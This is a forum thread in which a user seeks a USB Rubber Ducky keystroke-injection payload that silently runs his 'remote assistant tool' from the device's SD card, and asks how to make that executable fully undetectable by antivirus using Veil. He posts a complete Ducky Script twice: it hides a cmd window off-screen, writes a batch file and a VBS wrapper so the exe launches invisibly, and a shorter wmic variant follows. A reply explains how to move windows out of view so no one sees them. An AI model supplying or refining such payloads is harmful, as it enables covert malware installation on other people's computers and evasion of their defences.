Jump to content

need Rubber Ducky config


Net_Spy
 Share

Recommended Posts

Greetings ,

I would like to setup rubber ducky usb , I would appriciate if your assistance and I would like FUD my remote assitant tool exe as well any idea how to get this using veil or any other good method to FUD it with 0 detection.

Thanks

Regards

Link to comment
Share on other sites

well I've generate following payload with the help of gui encoder.

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\form1.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

I copied exe into sdcar root path and inject.bin as well then pluged into windows XP it shows all command on cmd screen but exe does not execute .

Regards

Net_Spy

Link to comment
Share on other sites

It does not work , Ive install twin composit firmware its worked. One more thing I would like to know is there any way that payload runs with out any popup windows. Looking forward for your kind respond.

Regards

Net_Spy

Link to comment
Share on other sites

It does not work , Ive install twin composit firmware its worked. One more thing I would like to know is there any way that payload runs with out any popup windows. Looking forward for your kind respond.

Regards

Net_Spy

Sadly there isn't. The ducky is just a USB HID, so it is limited to only what a USB keyboard can do.

Link to comment
Share on other sites

Thanks , but I just wanted to hide those windows which opened via above mentioned script . like opening run prompt and typing command then opening cmd minimizing it etc. I only want to know is there a way to do these all silently .

Regards

Net_Spy

Link to comment
Share on other sites

You could just move the window out of view by doing the following:

ALT+SPACE
M
DOWN
DOWN
DOWN
ENTER

Just keep in mind the above is more or less pseudocode....all this is doing is bringing up a menu, choosing "Move" and then keep hitting the down key until it's off the screen then hitting "Enter" to bring it back into focus. This was it's off the screen so no one can see it but you can still keep typing and running commands.

Link to comment
Share on other sites

  • 5 months later...

Greetings ,

I've come across to a script that claim to be faster then script written by

overwraith
REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. 
REM Encoder V2.4+
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
overwraith script working greate only taking few seconds and lots of commands .

Following is the shorten scrip

DELAY 3000
GUI r
DELAY 100

cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe

DELAY 10
ENTER

I've tried it but fialed to execute it , It gives error windows can not find 'c' .Make you typed the named correctly , and then try again.

Is there any way to make that above short script to run an exe from sd .

Regards

Net_Spy

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...